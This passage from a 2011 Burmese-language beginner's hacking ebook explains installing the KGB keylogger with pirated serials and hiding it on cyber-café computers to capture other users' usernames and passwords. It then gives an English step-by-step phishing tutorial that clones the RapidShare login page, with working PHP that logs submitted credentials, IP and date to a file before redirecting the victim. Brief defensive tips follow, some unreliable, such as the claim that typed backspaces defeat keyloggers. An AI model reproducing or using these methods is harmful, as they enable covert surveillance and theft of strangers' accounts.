ျပီးေတာ့တျခားkeylogger ေတြလိုလဲ magic key ဆိုတဲ့ ျပန္ေဖာ္key ကိုမွတ္စရာမလိုပါဘူး။
Run box ကေန runkgb လို႔ရိုက္လိုက္ရင္ တက္လာပါတယ္။
ျပီးေတာ့ kgb ကို တျခားသူေတြသံုးလို႔မရေအာင္ password ခံထားလို႔ရပါတယ္။
ကၽြန္ေတာ္ဘာေၾကာင့္ keylogger အေၾကာင္းေျပာရသလဲဆိုေတာ့…hacker ေတြဟာ သူတို႔ေတြ ….
အစဥ္ေျပေစဖို႔အတြက္ keylogger ေတြကိုဖန္တီးခဲ့လို႔ပဲျဖစ္ပါတယ္။
ဒါေၾကာင့္ေျပာျပတာပါ။ျပီးေတာ့ ဘယ္ keylogger ကိုသံုးရမလဲမသိရင္ KGB keylogger ကိုသံုးဖို႔ …
ေျပာခ်င္ပါတယ္။
ဒါေၾကာင့္ ကၽြန္ေတာ့အေနနဲ႔ install လုပ္ပံုလုပ္နည္းကို ေျပာျပသြားပါမယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 32
ျပီးရင္သံုးပံုသံုးနည္းပါေျပာပါမယ္။
Installing KGB Keylogger
မသြင္းရေသးခင္ နဲနဲေလာက္ေျပာပါရေစ။ကၽြန္ေတာ့စက္မွာ အရင္တုန္းက စမ္းသပ္တဲ့အေနနဲ႔ KGB ကိုသြင္းဖူး
ထားတဲ့အတြက္ install လုပ္တဲ့ေနရာမွာ စာဖတ္သူနဲ႔ တူခ်င္မွတူမွာပါ။
ပထမဆံုး install လုပ္တာဆိုရင္ေတာ့…ကြဲပါတယ္။ဒါေလးေတာ့ သီးခံေပးပါေနာ္။
ပထမဆံုး ရလာတဲ့ rar file ကိုျဖည္ပါ။setup file ကို run ပါ။
OK ႏွိပ္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 33
next ႏွိပ္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 34
ပံုမွာျပတဲ့အတိုင္းေရြးေပးပါ။next ကိုႏွိပ္ပါ။
I agree ကိုႏွိပ္ပါ။
next ႏွိပ္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 35
Browse နဲ႔လမ္းေၾကာင္းေရြးပါ။next ကိုႏွိပ္ပါ။ျပီးရင္ ကၽြန္ေတာ္တစ္ဆင့္ေက်ာ္လုိက္ပါမယ္။
install ႏွိပ္ပါ
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 36
finish ကိုႏွိပ္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 37
Register လုပ္ပါ။
ေပးထားတဲ့ အထဲက serial ေတြကိုျဖည့္လုိက္ပါ။OK ႏွိပ္ပါ။
ဒါဆိုရင္ register လုပ္တာေရာ install လုပ္တာပါ ျပီးဆံုးပါျပီ။
Using KGB keylogger
KGB ကိုဘယ္ေနရာမွာ ကၽြန္ေတာ္တို႔ အသံုးမ်ားသလဲဆိုေတာ့…ကၽြန္ေတာ္သိသေလာက္ေတာ့
၂ေနရာဗ်။ ပထမေနရာက Cyber café ေတြမွာ ကၽြန္ေတာ္တို႔လို လက္ေဆာ့ကလိတတ္တဲ့လူေတြက သံုးတယ္
ေနာက္တစ္ေနရာက မိဘေတြသံုးတယ္။ကုိယ့္သားသမီးေတြ ဘယ္ website ေတြကိုၾကည့္တယ္။
ဘာလုပ္တယ္ဆိုတာကို သိနိုင္ေအာင္ သြင္းထားတတ္ပါတယ္။
ထားပါေတာ့။ဒါက သံုးတဲ့ေနရာကိုေျပာတာပါ။
ကၽြန္ေတာ္တို႔ဘယ္လို သံုးမလဲ။ ဟုတ္ျပီ ေျပာမယ္။
အရင္ဆံုး cyber café တစ္ခုခုမွာ keylogger ကိုသြင္းလိုက္ပါ။
ျပီးရင္ ဒီတိုင္း ပစ္ထားလိုက္ပါ။hide လုပ္ျပီးေတာ့ေပါ့ဗ်ာ။
ေနာက္ ကုိယ္ အားတဲ့အခ်ိန္မွာ ျပန္ျပီးေတာ့ keylogger ကိုသြားဖြင့္။ဒါဆိုရင္ keylogger သြင္းထားတဲ့
စက္မွာ ထိုင္သြားတဲ့လူေတြရဲ့ username ေတြ password ေတြရပါမယ္။ဒီေနရာမွာ ျခြင္းခ်က္တစ္ခုရွိပါတယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 38
Defreeze သြင္းထားတဲ့စက္ေတြဆိုရင္မရပါဘူး။ေန႔မကူးခင္ keylogger ကိုျပန္သံုးမွရပါမယ္။
ကၽြန္ေတာ္ကစမ္းေတာ့ျပခ်င္တယ္ဗ်။ဒါေပမယ့္ ကၽြန္ေတာ့အိမ္မွာက အင္တာနက္မခ်ိတ္ထားတဲ့အတြက္
မရွင္းျပနိုင္တာေတာင္းပန္ပါတယ္ခင္ဗ်။
တကယ္လို႔ သင့္အေနနဲ႔ KGB keylogger ကိုမသံုးခ်င္ဘူးဆိုရင္ ေနာက္တစ္မ်ိဳးေျပာင္းသံုးလို႔ရပါတယ္။
http://www.monitoring-spyssoftware.com မွာ Golden eye ဆိုတဲ့ software ကိုdownload
ရယူျပီးသံုးနိုင္ပါတယ္။
^_^
Preventing from Keylogger
ကုိယ္တိုင္လဲ အဲလိုမ်ိဳး Keylogger နဲ႔ျပန္မခံရခ်င္ဘူးဆိုရင္ေတာ့…ရွင္းပါတယ္။Cyber caféေတြမွာမသံုးပါနဲ႔။
တကယ္လို႔ cyber café မွာမသံုးလို႔မျဖစ္ဘူးဆိုရင္…
ပထမဆံုးလုပ္ရမွာက…ကုိယ္သံုးမယ့္ စက္မွာ Defreeze တင္ထားသလားဆိုတာကိုၾကည့္ပါ။
တကယ္လို႔တင္ထားတယ္ဆိုရင္ screen ရဲ့ ညာဘက္ေအာက္ေထာင့္နားေလးမွာ ၀က္ေခါင္းပံုေလးကိုေတြ႔မယ္။
အဲဒါဆိုရင္ အနဲငယ္စိတ္ခ်ရပါျပီ။
ေနာက္တစ္ဆင့္…task manager ကိုေခၚလိုက္ပါ။ctrl + alt +del ကိုႏွိပ္ျပီးေတာ့ေခၚပါ။
Process tab ေအာက္ကိုသြားပါ။msdt.exe ဆိုတဲ့ process ရွိသလားၾကည့္ပါ။မရွိဘူးဆိုရင္…ပိုျပီးေတာ့စိတ္ခ်
ရပါတယ္။လံုး၀ၾကီးေတာ့ စိတ္ခ်ရတယ္ဆိုတာမရွိပါဘူး။ကၽြန္ေတာ္အေပၚကေျပာခဲ့တဲ့ keylogger ဆိုရင္
Task manager ထဲမွာ မေပၚပါဘူး။
ဒီ့ထက္ပိုျပီးစိတ္ခ်ရေအာင္…username ေတြ password ေတြရိုက္တဲ့အခါ backspace ေတြပါေအာင္ရိုက္ပါ။
Keylogger ေတြက backspace ကိုမမွတ္ပါဘူး။ဒါေၾကာင့္အဲဒီ့နည္းနဲ႔ကာကြယ္နိုင္ပါတယ္။
လံုး၀ၾကီး စိတ္ခ်ရမယ္လို႔ေတာ့ ကၽြန္ေတာ္အာမဘေႏၱမခံနိုင္ပါဘူးခင္ဗ်ာ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 39
Chapter 8
Phishing
How to make a basic Phishing page
How to Make A Basic Phisher here we share how to make basic phishing for beginner , that can
trick other people to stole some information and data
1. we use rapidshare.com as our page example
2. Go to www.rapidshare.com then jump to the premium account log-in screen at the url :
https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi
3. click right click on page and view source
4. select and copy all, put in the notepad and save as .txt
5. there is so money random html code but we interest these two method and action.
6. find the words "method" (without quotes) in document
7. i think the result will be same like that : method="post"
8. Change the word post to the word get.
9. then , find again the word named "action"
10. i hope u will see like this action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. replace next.php instead of url , it will be look like action="next.php"
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 40
12. Save this file as index.html and make a new document with notepad for next.php , (the
page that they are directed to after you have gotten their log-in information)
13. Copy and paste this code into the notepad document: Code: CODE $datum = date('d-m-Y /
H:i:s'); $ip = $_SERVER['REMOTE_ADDR']; header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle,
$variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); }
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n"); fwrite($handle, "\r\n");
fclose($handle); setcookie ("user", "empty", time()+3600); exit; ?>
14. at "Location: Put your REDIRECT URL Here" u can put ur url here, in this case , i use
Code: header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"); then save as
next.php
15. than open notepad again and make a document name password.txt .because we use the
name password.txt Code: $handle = fopen("password.txt", "a");
as for me ,i chose password.txt as my file where I want the passes to be stored, but u can use
the name as u like . 16. Go to free host that support php , and upload these 3 files , make use
delete uploaded by webhost ,such as index.html 17. go and check ur url and test as user and
password i hope u be sucess .
ကၽြန္ေတာ့အေနနဲ႔ Phishing အေၾကာင္းကို ရွင္းျပဖို႔သိပ္ျပီးအားမသန္တဲ့အတြက္ နားလည္ေပးေစခ်င္ပါတယ္။
ဒါေလးကေတာ့ www.mmso.org မွာေတြ႔တာေလးပါ။
ကိုယ္ပိုင္ Phishing လုပ္နည္းျဖစ္ပါတယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 41
Preventing Phishing
Phishing အေၾကာင္းကိုသိပ္မသိေပမယ့္ ဒီေကာင့္ကိုဘယ္လိုေရွာင္ရသလဲဆိုတာကိုေတာ့သိပါတယ္။
ေတြ႔တဲ့ Link တိုင္းကို၀င္လို႔ရပါတယ္။ဒါေပမယ့္ အဲဒီ့ link ေပၚမွာ ကိုယ့္ gmail acoount ရဲ့ password ေတြ
Username ေတြကိုေတာင္းခံလာျပီဆိုရင္ ျပန္ထြက္လုိက္ပါ။
ျပီးေတာ့ gmail ကို၀င္မယ္ဆိုရင္ link ကိုေသခ်ာၾကည့္ပါ။
http://www.google.com လို မ်ိဳး အမွန္အကန္ျဖစ္နိုင္တဲ့ link ကိုၾကည့္ျပီး၀င္ပါ။
ဒါဆိုရင္ တတ္နိုင္သေလာက္ေရွာင္နိုင္ပါတယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 42
BYE ### BYE ###
ကဲ…ကၽြန္ေတာ့ရဲ့ အေျခခံက်တဲ့ hacking စာအုပ္ေလးကေတာ့ ဒီေနရာေလးမွာတစ္ခန္းရပ္ပါရေစခင္ဗ်ာ။
Hacker ျဖစ္ခ်င္တဲ့သူတစ္ေယာက္ကိုအၾကံေပးခ်င္တာကေတာ့…ဒီေလာက္နဲ႔ေက်နပ္မေနပါနဲ႔။
ဆက္ျပီးေတာ့ေလ့လာပါ။နည္းပညာဆိုတာၾကီးက ဘယ္ေတာ့မွ ေလ့လာလို႔ျပီးသြားတယ္ဆိုတာမရွိပါဘူး။
ေလ့လာမယ္ဆိုရင္ေတာ့ website ေလးတစ္ခုကိုရည္ညႊန္းခ်င္ပါတယ္။
ကၽြန္ေတာ္ကိုယ္တိုင္ member အျဖစ္ပါ၀င္ေနတဲ့ website ေလးပါ။
www.myanmarhacking.com လို႔အမည္ရပါတယ္။
သင့္အေနနဲ႔ ဒီစာအုပ္ကုိဖတ္ျပီးသြားျပီဆိုရင္ Hacking အေၾကာင္း Hacker အေၾကာင္းေတြကို…
အနဲငယ္ေလာက္ျဖစ္ျဖစ္နားလည္မွာပါ။
တကယ္လို႔မ်ား ဒီစာအုပ္ကိုဖတ္ျပီးျပီ ဆိုရင္ ကၽြန္ေတာ့ဆီကို mail ပို႔ျပီးေတာ့…
စာအုပ္အေပၚ ေ၀ဖန္ခ်က္ေလး ေရးသားေပးဖို႔ ေတာင္းဆိုလိုပါတယ္……
ဒါမွလဲ ကၽြန္ေတာ့အတြက္ေနာက္ထပ္စာအုပ္ေတြကို ပိုမိုေကာင္းမြန္ေအာင္ ဖန္တီးနိုင္မွာ ျဖစ္ပါတယ္။
ကၽြန္ေတာ့ရဲ့ gmail ကေတာ့ blind.heart7@gmail.com ျဖစ္ပါတယ္။
ေနာက္တစ္ခုေတာင္းဆိုလိုတာက…ဒီစာအုပ္ေလးကို လူေတြသိနိုင္ေစဖို႔ သင္တို႔ရဲ့….
Website,Blog,Forum ေတြမွာ…ေၾကာ္ျငာေပးၾကပါခင္ဗ်။
ကၽြန္ေတာ့အေနနဲ႔ေနာက္ပိုင္း ဒီထက့္ေကာင္းတဲ့စာအုပ္ေတြကို ေရးသားမယ္။မေရးနိုင္ရင္…အဂၤလိပ္
စာအုပ္ေတြကို ဘာသာျပန္ေပးပါမယ္ခင္ဗ်။’’’’’’’’’’’’’’’’’’’’’’’Be’’’’’’’’’Enjoy’’’’’’’’’’’’’’’’’’’’
### Kglay ###blind.heart7@gmail.com ###
www.myanmarhacking.com